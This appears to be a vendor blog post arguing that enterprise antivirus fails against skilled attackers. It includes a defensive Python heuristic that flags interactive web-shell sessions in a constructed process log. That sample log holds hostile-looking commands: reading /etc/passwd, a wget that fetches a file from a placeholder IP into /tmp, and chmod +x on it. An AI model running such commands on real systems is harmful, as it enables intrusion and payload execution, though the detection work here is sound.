Written by Dr Al Hartmann and presented by Charles Leaver, Ziften CEO
Dwindling Effectiveness of Enterprise Antivirus?
Google Security Expert Calls Antivirus Apps Ineffective ‘Magic’.
At the recent Kiwicon hacking conference in Wellington, New Zealand, Darren Bilby, manager of Google’s Platform Integrity team, preached cyber-security heresy. Charged with investigating extremely advanced attacks, including the 2009 Operation Aurora campaign, Bilby lumped enterprise antivirus in with a set of ineffective tools installed to tick a compliance checkbox, at the expense of genuine security:
We have to stop buying those things we have actually shown are not effective… Anti-virus does some useful things, but in reality, it is more like a canary in a coal mine. It is even worse than that. It’s like we are loafing around the dead canary saying ‘Thank god it breathed in all the toxic gas.’
Google security experts aren’t the first to weigh in against enterprise antivirus, or to draw unflattering comparisons, in this case to a dead canary.
Another highly experienced security team, FireEye Mandiant, compared static defenses such as enterprise antivirus to that notoriously failed Second World War fortification, the Maginot Line:
Like the Maginot Line, today’s cyber defenses are quickly becoming an antique in today’s risk landscape. Organizations invest billions of dollars every year on IT security. But cyber attackers are easily outflanking these defenses with smart, fast-moving attacks.
An example of this was offered by a Cisco managed security services executive presenting at a conference in Poland. His team had identified anomalous activity on one of their enterprise customers’ networks and reported the suspected server compromise to the customer. To the Cisco team’s amazement, the customer simply ran an antivirus scan on the server, found no detections, and put it back into service. Horrified, the Cisco team conferenced the customer in to their monitoring console and was able to show the attacker conducting a live remote session at that very moment, complete with typing errors and re-issued commands on the compromised server. Finally convinced, the customer took the server down and fully re-imaged it. The enterprise antivirus had been a useless distraction: it had not served the customer, and it had not stopped the attacker.
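The behaviour the Cisco team watched on their console, an operator mistyping a command and re-issuing it a few seconds later, is exactly the kind of signal that a signature scan never looks for but endpoint telemetry exposes directly. The following is an added illustration, not code from Cisco, Ziften or the original post: a small Python heuristic over a constructed process-execution log (the format, hostnames, users and commands are all made up for the example) that scores each (host, user, parent process) stream for a failed command followed within a short window by a near-identical or identical command. A near-miss reissue is treated as a corrected typo and weighted more heavily than an exact repeat, since automated retries also repeat failed commands verbatim.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone
from difflib import SequenceMatcher

# Constructed sample process-execution log, loosely shaped like an EDR or
# auditd command-line feed (this format is an assumption for the example).
# Fields: timestamp, host, user, parent process, quoted command line, exit code.
# The www-data entries mimic an attacker typing interactively through a web
# shell: a mistyped command fails, then is re-issued correctly; a download that
# fails is repeated verbatim. The cron and sshd entries are benign background.
SAMPLE_LOG = """\
2016-11-18T03:12:07Z web01 www-data apache2 "netsat -an" 127
2016-11-18T03:12:11Z web01 www-data apache2 "netstat -an" 0
2016-11-18T03:12:40Z web01 www-data apache2 "cat /etc/passwd" 0
2016-11-18T03:13:02Z web01 www-data apache2 "wget http://198.51.100.7/x -O /tmp/.x" 4
2016-11-18T03:13:09Z web01 www-data apache2 "wget http://198.51.100.7/x -O /tmp/.x" 0
2016-11-18T03:13:15Z web01 www-data apache2 "chmod +x /tmp/.x" 0
2016-11-18T03:00:00Z web01 root cron "/usr/bin/logrotate /etc/logrotate.conf" 0
2016-11-18T03:05:00Z web01 root cron "/usr/bin/apt-get update" 100
2016-11-18T03:10:00Z web01 root cron "/usr/bin/apt-get update" 100
2016-11-18T09:02:00Z web01 ops sshd "systemctl status apache2" 0
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d+)$')


def parse_log(text):
    """Parse the constructed log format into event dicts; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, host, user, parent, cmd, rc = m.groups()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "host": host, "user": user, "parent": parent,
            "cmd": cmd, "rc": int(rc),
        })
    return events


def find_interactive_sessions(events, window_s=60, min_ratio=0.8, threshold=2):
    """Score each (host, user, parent) stream for keyboard-driven behaviour.

    A failed command followed within window_s seconds by a near-identical
    command (SequenceMatcher ratio >= min_ratio but < 1.0) is treated as a
    corrected typo and scores 2. An exact re-issue of a failed command scores
    only 1, because retry loops do that too. Streams whose score reaches
    threshold are returned with the evidence that produced the score.
    """
    streams = defaultdict(list)
    for ev in events:
        streams[(ev["host"], ev["user"], ev["parent"])].append(ev)

    findings = []
    for (host, user, parent), evs in streams.items():
        evs.sort(key=lambda e: e["ts"])
        score, evidence = 0, []
        for prev, cur in zip(evs, evs[1:]):
            if prev["rc"] == 0:
                continue  # only a failure followed by a retry is interesting
            gap = (cur["ts"] - prev["ts"]).total_seconds()
            if gap > window_s:
                continue  # too slow to be someone correcting themselves
            ratio = SequenceMatcher(None, prev["cmd"], cur["cmd"]).ratio()
            if ratio == 1.0:
                score += 1
                evidence.append(("reissue", prev["cmd"]))
            elif ratio >= min_ratio:
                score += 2
                evidence.append(("typo", prev["cmd"], cur["cmd"]))
        if score >= threshold:
            findings.append({"host": host, "user": user, "parent": parent,
                             "score": score, "evidence": evidence})
    return findings


def main():
    for f in find_interactive_sessions(parse_log(SAMPLE_LOG)):
        print(f"{f['host']}: {f['user']} via {f['parent']} looks interactive "
              f"(score {f['score']})")
        for item in f["evidence"]:
            print("   ", item)


if __name__ == "__main__":
    main()
```

On the sample data only the www-data stream under apache2 is flagged: the netsat/netstat pair and the repeated wget add up to a score of 3, while the cron retry of apt-get is five minutes apart and falls outside the window. The heuristic says nothing about malware signatures; what makes the finding alarming is the context it surfaces, a web-server service account behaving like a person at a keyboard. In production you would tune the window and ratio against your own telemetry and expect an interactive administrator over sshd to be flagged as well, which is the correct result for a detection that feeds triage rather than blocks on its own.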
So Is It Time to Ditch Enterprise Antivirus Now?
I am not yet ready to declare an end to the age of enterprise antivirus. But I recognize that businesses have to invest in detection and response capabilities to complement traditional antivirus. Increasingly, though, I wonder who is complementing whom.
Skilled, targeted attackers will reliably evade antivirus defenses, so against your most serious cyber threats, enterprise antivirus is essentially worthless. As Darren Bilby noted, it does do some useful things, but it does not provide the endpoint protection you need. So don’t let it distract you from the highest-priority cyber-security investments, and don’t let it distract you from the security measures that do substantively help.
Proven cyber defense measures include:
Configuration hardening of networks and endpoints.
Identity management with strong authentication.
Continuous network and endpoint monitoring, and constant vigilance.
Strong encryption and data protection.
Staff education and training.
Continual threat re-assessment, penetration testing, and red/blue teaming.
In contrast to the enterprise antivirus Bilby criticized, none of the measures above is ‘magic’. They are simply the ongoing work of competent enterprise cyber-security.